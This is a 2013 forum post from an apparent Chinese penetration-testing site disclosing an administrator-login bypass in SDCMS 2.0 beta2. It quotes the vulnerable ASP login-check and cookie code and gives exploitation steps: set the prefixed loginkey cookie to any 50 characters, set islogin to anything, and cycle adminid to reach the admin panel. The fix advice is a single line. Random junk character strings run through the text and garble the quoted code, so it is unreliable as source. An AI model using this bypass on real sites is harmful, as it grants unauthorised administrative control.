中国网络渗透测试联盟

标题: SDCMS后台绕过直接进入漏洞 [打印本页]
作者: admin    时间: 2013-7-26 12:42
标题: SDCMS后台绕过直接进入漏洞
要描述:, O' }! @8 n$ F3 X, `3 N

4 b- |! H8 F9 S( R$ |& BSDCMS后台绕过直接进入:测试版本2.0 beta2 其他版本未测试
0 a6 D( u' a7 x2 i- f4 x3 X* Y! ~详细说明:
- H; E8 d  t8 C8 \% |: zIslogin //判断登录的方法% f$ Q# f$ @# l) V1 ^

' F2 f6 ?: n# rsub islogin()5 R' U! A- @& n/ D& p0 C9 r: N' ~9 Y
( n0 y4 M' A% X1 D* C3 b# y3 T
if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then 5 I1 Y4 O; d" W/ ?. w/ {
2 w4 [/ V& D4 f; i1 A! Y
dim t0,t1,t2 8 z: @6 J9 B( p' I0 |: e7 R6 a
7 Z  A9 A& {3 g
t0=sdcms.getint(sdcms.loadcookie("adminid"),0) loadcookie * P- g2 r+ @" Q4 \" D! X
; p* d4 q3 a# u+ g) E
t1=sdcms.loadcookie("islogin")
" I1 S1 C8 q; W9 I: Z; c5 @   l: h# F/ G; A
t2=sdcms.loadcookie("loginkey")
$ _) ~/ X: y) P ' o% K6 S; ~0 }" k6 x1 J9 j
if sdcms.strlen(t0)=0 or sdcms.strlen(t1)=0 or sdcms.strlen(t2)<>50 then //这里判断很坑爹 sdcms.strlen(t2)<>50 loginkey 没有任何要求 只需要输入50个即可往下执行
1 S: }' z6 k4 x  q7 E   B; F7 G+ W% {. H
//, ^5 t$ R5 E- B8 p9 V7 j: F

( u" g. ~& E( Dsdcms.go "login.asp?act=out"
0 V: J4 |9 K( v) h9 j: m, @
/ O- ^4 q, h# ~9 z9 [exit sub, {6 X# l' ]$ I4 b: c

5 p0 ?+ A1 w* g; r( T; K+ J. aelse
, K; x% Y$ K1 k* v" s, m( v $ A" Z+ w. E$ C% d: S& K5 q
dim data
* ~+ e2 E7 y9 [
/ T6 r# b$ l5 ~0 ^" g% |data=sdcms.db.dbload(1,"adminid,adminname,adminpass,islock,groupid,g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&t0&"","") //根据管理员ID查询 ID可控
8 i4 u( o% s' _ 6 S1 u; |9 A7 S- A% s$ m' N2 T* V/ |
if ubound(data)<0 then
6 [# M1 K$ K" U
3 n' \; D( V( Xsdcms.go "login.asp?act=out"
9 g$ r' L5 }- q  E5 T& [, Z
! t8 X, W( k4 U+ \# Q; ]' K  ^3 hexit sub) s3 p( C9 N. ]$ _) c

: _$ b% Q0 q' L% t/ x% i; nelse
% m$ Y' t0 c! t3 B6 E4 g
1 b8 {; Z" V, m$ {6 X; c$ pif instr(data(1,0)&data(2,0),sdcms.decrypt(t1,t2))<0 or data(3,0)=0 then
1 G! L. K- j, Q$ Y
8 |/ b& S5 Y0 `sdcms.go "login.asp?act=out"
0 X2 Q% _! D: z& s1 [; t: G: R- q : ]5 `) f4 U8 p" ^% m
exit sub9 X7 U, [. @. W# I

# y( r4 _$ Q9 [3 R# D( w4 f/ ^else
& B# g3 a. Q( \2 ~- V# f ' S( C" ?  M4 c' l) [% A) C
adminid=data(0,0)0 X( D- [' k; h  N& h

7 f$ X! V' ]8 d& c- n- ladminname=data(1,0)
: x' A6 {$ J* D: {
$ A( ?* L* Z- H) B: ]# H8 sadmin_page_lever=data(5,0)
( n( Y3 U6 u9 u+ H 1 t1 d' i0 }' F4 i; |
admin_cate_array=data(6,0)" f9 U, z. l$ A
: k1 Z) P1 x, E
admin_cate_lever=data(7,0)
- E  \  w- A! s+ ]+ _' L ( X- ^- L' `6 \7 P' Y* a
if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0$ n! ^2 ^( d& b; N

! q! @+ F# Z' D0 z* Eif sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
8 c7 Z% o' m& A5 b: i3 Z" o6 v
$ |2 [1 }( o. E/ Y; qif sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0" R- [: x( @/ ?  @: e: S
3 F2 C' Y- G7 ?7 n1 Q+ z2 q2 c
if clng(admingroupid)<>0 then
. H) f2 ~' ~  W, Z ; X) f* ?# W' z' G. l2 }3 p
admin_lever_where=" and menuid in("&admin_page_lever&")"5 B! a1 b! ~% v

1 c9 v1 t6 g) J4 w- iend if4 m5 R6 A& f( j5 X- q  z. y4 ^

1 y& w- \; Z* m4 K( esdcms.setsession "adminid",adminid' ?& q8 \/ Y6 l2 X# e; B$ c6 U* I
% J( J/ Z7 g( ~8 y) i
sdcms.setsession "adminname",adminname' k4 d! `! Q1 S. t% d2 S6 X. X

+ Z0 I" @3 A6 v( E, m9 Zsdcms.setsession "admingroupid",data(4,0)
! w" _1 a% }, t5 }, d 5 K/ M. r7 l0 \, }
end if9 _. B3 ]! Q( e, a! {

/ O/ ^/ ?* Z! \, h/ M* p5 eend if7 Y& @0 |/ m2 b7 \$ b5 D/ w9 ?+ l, P
) ^5 L! w7 u$ L; X' H! f- |
end if
+ R8 Y0 U  E" X) p! X8 Z8 X' f5 J! @
, G5 b8 |6 K: V% r* x- ]else
3 |5 a9 z+ P0 y- c5 F
! g  C$ w" @- s. l& x( t+ fdata=sdcms.db.dbload(1,"g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&adminid&"","")
+ B5 U# _# C( n1 h% M1 A
+ J- B: }! v* a9 Y. w6 qif ubound(data)<0 then/ H+ ?4 l: c- Q1 U# K; B+ l
5 a$ \2 V5 @5 ~0 L- Y5 `% W
sdcms.go "login.asp?act=out". e* w( h! l1 ]' A# R& }/ n
* _% u# z- V: U$ ~# u
exit sub3 J+ V7 l2 t0 l3 ~
; d2 X( t5 B3 `! @* q
else( Z3 e+ ~, L$ I3 M5 D- i! B
% `1 t. U) v9 Q7 I: W
admin_page_lever=data(0,0)
% w; o! s4 r; Q
8 u. Z) b& P7 kadmin_cate_array=data(1,0)
) H) b3 i& K2 X1 ^$ u* v ; d5 h3 u7 j) m5 x3 R' e; Y. x( f
admin_cate_lever=data(2,0)9 `) @9 {9 o8 x. z: t( _0 Y/ f
' H0 Z$ m; l% v3 D
if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0  y: Z/ {* C4 {3 @3 [% m! N
9 M& O# Y* u1 W
if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0* l6 R! B% q) ?. b0 R8 V" ]
8 ^5 Z. F' e% h! P$ ]8 {* a* A
if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0$ D& C! {+ x, ?! _8 Y& X2 j% Q) j) Y& I

) m! N# q; j; V$ Y  Tif clng(admingroupid)<>0 then
( `$ D7 ~( N' v. Z 2 Y. R! r# e3 c1 [
admin_lever_where=" and menuid in("&admin_page_lever&")"$ B& d8 `# B" }. s2 M2 @6 o) Q5 `

" G% R( I* d) U+ aend if' p  t" h7 x8 n! M$ q
0 c5 [3 @: I+ N0 [5 [# m5 C
end if0 l# y' D2 }3 F9 o, V

1 C9 K* ]4 Z7 k9 i3 c8 Y2 y% r# J+ lend if
# `( y& b+ Q6 B1 H- A5 n 7 L1 Y( T5 e; x6 k" s$ s4 [
end sub% A+ u7 S6 n% ?# I
漏洞证明:, ^4 _0 R+ o8 O! [/ l
看看操作COOKIE的函数( u1 H. v9 o1 l8 \

8 j+ @! f1 i; Q6 kpublic function loadcookie(t0)
2 F/ x0 l5 I: i2 y8 w
; ~+ V2 Y) h: m, n, E6 Y2 f2 `$ c( ~loadcookie=request.cookies(prefix&t0)1 O* b4 b8 R4 u/ O/ |
: }6 i9 U7 B/ N3 }$ B4 F: V
end function
, s/ N1 A9 ^7 F+ f
( U' n0 D2 Y/ U7 n# R4 Opublic sub setcookie(byval t0,byval t1)* |4 g3 m9 ?4 t. f( O
% C8 i% }: v4 o3 n0 \$ N; @" [
response.cookies(prefix&t0)=t1
# T! x* S+ F; }0 _. M( F 7 b5 a. R9 U" P) G  c
end sub2 {3 w2 d/ y; w3 S
* Q. `; T- y8 Z$ U" S
prefix
! B" ~: E* r9 R 2 p+ ~/ Q$ l" ^$ E6 M
'变量前缀,如一个空间下多次使用本程序的话,请每个程序配置不同的值2 X9 w8 E% ~9 H) M

! _+ |1 G" y. Z1 gdim prefix( k9 s; t" e0 N4 x& n5 \# A
4 z9 w" W2 w1 g3 T6 R7 k
prefix="1Jb8Ob"' A! u% S( _4 [3 [; a( Y- V5 q
; a- J- Q0 N6 s; Q' U
'这个值访问一下admin/login.asp?act=out 便可得到 在COOKIE里 . x) }  u8 E6 D$ d  P+ _

4 r+ N( }# G# T) z- s8 v* Osub out; X3 v" h$ }: D, `# z) \+ v

/ A9 e* J) k2 {  Rsdcms.setsession "adminid",""& N, Q$ m' S! I

, |9 V8 K6 E1 ?) C7 O* z6 j0 csdcms.setsession "adminname",""& Y5 M6 }- \# u  U& |, I
9 ^6 j0 o/ B! b3 V2 q1 E# y
sdcms.setsession "admingroupid",""
# k. p1 ]* f1 E% s2 D
. H# j) @0 j' \) k* l0 ^( C* Vsdcms.setcookie "adminid",""# E( v' [+ l' T7 L6 a8 B! r8 D$ E
. ?! p8 Y! t! Z# E' Z. B! x+ J) ~
sdcms.setcookie "loginkey","": D) ?9 D# C* j" w0 s" M3 J2 a

: ?( `4 Q. U: o$ k2 s; Q0 }5 Ksdcms.setcookie "islogin",""
7 d8 @7 ~" D# u 3 g2 d" `  B4 {
sdcms.go "login.asp"* J, J' ]* `; [) R

8 {/ o& b9 V! `! Gend sub1 t4 u- X0 X* H' u2 `) X
- g- |' E4 I4 z- [
# x% p9 {9 h: M; I! h3 H7 K- }
利用方法:设置cookie prefixloginkey 50个字符 prefixislogin 随意 循环下prefixadminid 即可 默认1 然后访问后台,就可以了!# }- i' S  Y, D- C
修复方案:& B$ N1 N( _, C6 Q! m
修改函数!
, G# j, I$ W( n/ g1 M3 ?" J



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2